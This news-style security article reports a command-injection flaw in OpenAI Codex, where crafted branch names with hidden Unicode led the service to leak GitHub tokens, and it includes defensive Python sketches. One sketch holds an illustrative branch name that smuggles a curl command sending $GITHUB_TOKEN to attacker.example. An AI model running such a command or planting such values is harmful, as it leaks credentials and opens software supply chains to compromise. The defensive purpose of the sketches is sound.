Critical Vulnerability in OpenAI Codex Allowed GitHub Token Compromise
Source: SecurityWeek
OpenAI’s Codex, the large language model that turns natural‑language prompts into runnable code, harboured a command‑injection flaw that let attackers siphon GitHub authentication tokens. Security researchers discovered an obfuscated token while probing the interaction between Codex and GitHub repositories, then traced the leak to maliciously crafted branch names that embedded hidden Unicode control characters. When Codex processed such a branch name, it executed a concealed command that echoed the repository’s `GITHUB_TOKEN` back to the attacker’s server.
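SecurityWeek’s report does not publish the exact payload, but the mechanism described relies on branch names carrying invisible Unicode control or format characters. A minimal defensive check along those lines might look like the sketch below; `is_suspicious_branch_name` is a hypothetical helper, not the scanner OpenAI shipped.

```python
import unicodedata

# Unicode general categories that can hide or reorder text in terminals,
# logs, and diffs: Cc = control characters, Cf = format characters
# (e.g. the bidirectional override U+202E).
SUSPICIOUS_CATEGORIES = {"Cc", "Cf"}

def is_suspicious_branch_name(name: str) -> bool:
    """Flag branch names containing invisible control/format characters."""
    return any(unicodedata.category(ch) in SUSPICIOUS_CATEGORIES for ch in name)

# A branch that renders innocuously but hides a right-to-left override:
assert is_suspicious_branch_name("feature/\u202efix")
assert not is_suspicious_branch_name("release/v1.2")
```

Flagging rather than rejecting keeps the check conservative: category `Cf` also covers a few legitimate characters (such as zero‑width joiners in some scripts), so a real pipeline would review matches instead of blocking them outright.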
OpenAI moved quickly to patch the vulnerability, updating the cloud‑based Codex service and rolling out a dedicated “Codex Security Vulnerability Scanner” that has already examined 1.2 million recent commits, flagging nearly 800 critical issues. GitHub simultaneously released emergency fixes for three Enterprise Server bugs, including the one that allowed the token‑stealing injection to succeed.
The breach matters because Codex is embedded in a growing ecosystem of AI‑assisted development tools, from GitHub Copilot to third‑party IDE plugins. A compromised token grants read‑write access to private code, CI/CD pipelines, and any downstream services that rely on the token, opening a fast lane for supply‑chain sabotage or data exfiltration. Enterprises that have integrated Codex into internal tooling now face an urgent audit of access controls and token rotation policies.
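For teams building on this ecosystem, the broader lesson is how such an injection succeeds at all: untrusted strings like branch names reach a shell that interprets them. The report does not detail Codex’s internal plumbing, but a general mitigation is to pass untrusted input as a discrete argv element so no shell ever parses it. The sketch below demonstrates the pattern using Python as a stand‑in child process; the hostile branch name is illustrative only.

```python
import subprocess
import sys

# Illustrative untrusted branch name embedding shell metacharacters.
branch = "main; curl http://attacker.example/$GITHUB_TOKEN"

# Safe: argv-list invocation. The child receives the whole string as a
# single argument; no shell parses the ';' or expands '$GITHUB_TOKEN'.
# (Unsafe counterpart: f"git checkout {branch}" with shell=True.)
result = subprocess.run(
    [sys.executable, "-c", "import sys; print(sys.argv[1])", branch],
    capture_output=True, text=True, check=True,
)
assert result.stdout.strip() == branch  # delivered verbatim, not executed
```

The same principle applies to any tool shelling out to `git` with repository‑controlled data: build the argument list explicitly and never interpolate into a shell string.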
What to watch next: OpenAI has pledged to expand its automated scanner to all Codex users and to publish detailed remediation guidelines. GitHub is expected to tighten its token‑handling APIs and may introduce stricter validation of branch names. Regulators in the EU and Nordic states are beginning to scrutinise AI‑driven code generation for systemic security risks, so policy proposals on mandatory security audits for AI coding assistants could surface before year‑end. Developers should monitor both OpenAI’s and GitHub’s advisories and rotate any tokens that may have been exposed.